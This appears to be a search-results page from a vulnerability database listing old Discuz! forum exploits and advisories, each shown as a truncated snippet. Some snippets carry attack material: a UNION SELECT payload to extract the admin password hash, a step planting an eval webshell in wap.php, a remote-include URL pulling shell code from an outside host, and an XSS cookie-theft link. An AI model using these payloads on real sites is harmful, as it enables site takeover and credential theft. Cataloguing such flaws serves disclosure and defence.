Lucene search
K

573 matches found

myhack58
myhack58
added 2007/04/27 12:0 a.m.23 views

Discuz 5.0 0day + PM SMS bypass method-vulnerability warning-the black bar safety net

SQL: 0 union select password,2,0 from cdbmembers where uid=1/ uid=1/ 1 Is the ID value Obtain the Administrator's md5 password Into the background The forum management module edit details To modify the wap. php insert eval$POSTtlwbw Connection address Site address+/templates/default/wap.lang.php ...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/03/14 12:0 a.m.41 views

Discuz! pm.php注入EXP

No description provided by source. htmlbr / headbr / meta http-equiv="Content-Type" content="text/html; charset=gb2312"br / titleDz 0day by Jackal/titlebr / SCRIPT LANGUAGE="JavaScript"br / !--br / function ReplaceDemotempbr / var r, re;br / re = /S+s+S+/g;br /...

7.1AI score
Exploits0
myhack58
myhack58
added 2007/01/28 12:0 a.m.25 views

Discuz[0day]remote include vulnerabilities-vulnerability warning-the black bar safety net

discuz Forum, the Trevi Fountain plug in the DZ root directory there is a wish. php file,file fourth line: require $discuzroot.'./ include/discuzcode.func.php'; Obviously the program does not do any filtering,a full remote include vulnerability,the specific use of the method is very simple:...

7.6AI score
Exploits0
myhack58
myhack58
added 2007/01/24 12:0 a.m.37 views

Discuz forum to blast the physical path principle-vulnerability warning-the black bar safety net

Affected version Discuz! 5.2 Discuz! 5.1 Discuz! 4.1 Discuz! 4.0 ............. 1. common. inc. php issues code 2 0, line 7 ..... $navtitle = $navigation = "; $extra = isset$extra && pregmatch"/^+$/i", $extra ? $extra : "; $tpp = intvalempty$DSESSION ? $topicperpage : $DSESSION; $ppp =...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2007/01/01 12:0 a.m.40 views

Discuz论坛爆物理路径

当把变量当成数组提交时,如果不存在该数组,但存在变量,后面的pregmatch正则表达式匹配不了, 这样就出现了绝对路径的泄露 Discuz!5.2 Discuz!5.1 Discuz!4.1 Discuz!4.0 http://www.discuz.net/ 打开论坛 include 目录下的 common.inc.php $extra = isset$extra && pregmatch 改成 $extra = isset$extra && @pregmatch 1.common.inc.php问题代码207行 ..... $navtitle = $navigation = '';...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/11/28 12:0 a.m.81 views

Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit

Exploit for unknown platform in category web applications ================================================================ Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit ================================================================ 126 $result.=" ."; else $result.="...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/28 12:0 a.m.58 views

Discuz! 4.x - SQL Injection / Admin Credentials Disclosure

126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2006/10/30 12:0 a.m.31 views

Discuz! 5.0.0 RC1 SQL injection PoC

No description provided by source. !c:\python24\pytonbr / Discuz! 5.0.0 RC1 SQL injection PoCbr / Author: wofeiwo thx superheis helpbr / Date: Aug 12th 2006br / br / import sysbr / import httplibbr / from urlparse import urlparsebr / from time import sleepbr / br / def...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/10/29 12:0 a.m.12 views

Discuz 2.2F angle修改版存在安全漏洞

SaForums是angle基于Discuz 2.2F修改的论坛,过滤的比较严格,相对还是比较安全的。但是在APACHE中可以结合扩展名解释漏洞上传文件来获取WEBSHELL。 APACHE在解释扩展名的时候不是从文件名最后开始算,而是只要文件名中包含扩展名就会进行解释。例如aaa.php.rar会被当成php脚本来执行。 SaForums 修补方法: 去掉文件名中的"."字符: $filename = strreplace'.', '', $filename; SaForums默认是允许用户上传图片的,并且把上传的文件名进行一些处理: code in include\post.php...

7.1AI score
Exploits0
myhack58
myhack58
added 2006/10/29 12:0 a.m.19 views

Php5 GPC bypass flaw-vulnerability warning-the black bar safety net

In the discussion of specific defects before we start to learn a little about php security aspect of small things. magicquotesgpc option is php one of the important security settings, when the option is ON that is open at the time, all from GET, POST, COOKie is passed over the data in the'," and,...

6.9AI score
Exploits0
NVD
NVD
added 2006/10/27 4:7 p.m.10 views

CVE-2006-5561

SQL injection vulnerability in admincp.php in Discuz! GBK 5.0.0 allows remote attackers to execute arbitrary SQL commands via the cdbauth cookie...

7.5CVSS8.4AI score0.01054EPSS
Exploits1References4
CVE
CVE
added 2006/10/27 4:0 p.m.37 views

CVE-2006-5561

The CVE refers to SQL injection in Discuz! GBK 5.0.0 via the cdb_auth cookie in admincp.php, enabling remote attackers to run arbitrary SQL commands. Affected software: Discuz! with GBK encoding, version 5.0.0. Root cause: unsafely parsed cookie value leads to SQL injection. Impact per sources: p...

7.5CVSS8.7AI score0.01054EPSS
Exploits1References4Affected Software1
seebug.org
seebug.org
added 2006/10/26 12:0 a.m.11 views

Discuz! 5 SQL injection Exploit

No description provided by source. ?phpbr / printr'br / ---------------------------------------------------------------------------br / Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploitbr / by rgod [email protected] / site: http://retrogod.altervista.orgbr / dorks: "powere...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/10/26 12:0 a.m.13 views

discuz许愿池插件远程包含漏洞

许愿池插件的wish.php文件出的问题: require $discuzroot.'./include/discuzcode.func.php'; discuz bbs 目前客方已修正了此漏洞,请下载最新版本 手工利用方法: 远程包含漏洞,变量discuzroot过滤不严,利用方法: http://url/wish.php?discuzroot=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用CN.Tink的那个小马写个shell进去:...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/10/25 12:0 a.m.119 views

Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit

Exploit for unknown platform in category web applications ====================================================================== Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit ====================================================================== 126 $result.=" ."; else...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/10/25 12:0 a.m.87 views

Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure

126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2006/10/25 12:0 a.m.12 views

Discuz! 5.0.0 GBK - SQL Injection Admin Credentials Disclosure

Discuz! 5.0.0 GBK - SQL Injection Admin Credentials Disclosure 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result;...

Exploits0
myhack58
myhack58
added 2006/06/28 12:0 a.m.17 views

Talking about the Discuz code hazard-vulnerability warning-the black bar safety net

In fact, this is also my posts unintentionally saw, as a forum owner, the management posts often depends on its content validity. For example, when a bias article provides a connection, we often will go to click it, but when we are the point of connection is not what we expect connection, we have...

7.4AI score
Exploits0
OpenVAS
OpenVAS
added 2006/03/26 12:0 a.m.27 views

Discuz! <= 4.0.0 rc4 Arbitrary File Upload Flaw

The remote host is using Discuz!, a popular web application forum in China. According to its version, the installation of Discuz! on the remote host fails to properly check for multiple extensions in uploaded files. An attacker may be able to exploit this issue to execute arbitrary commands on th...

7.5CVSS7.4AI score0.02296EPSS
Exploits1References1
myhack58
myhack58
added 2006/03/14 12:0 a.m.61 views

PHP is a famous open source Forum: Discuz it! Cross-site Daquan-vulnerability warning-the black bar safety net

In the discuz! the The poster, back patch, PM, etc. of the subject are not filtered, so it can add the code. For example http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%2 2 The effect is the first to pop your cookie Use method: put the above code placed into the img. Applicable version:...

7.2AI score
Exploits0
Rows per page
Query Builder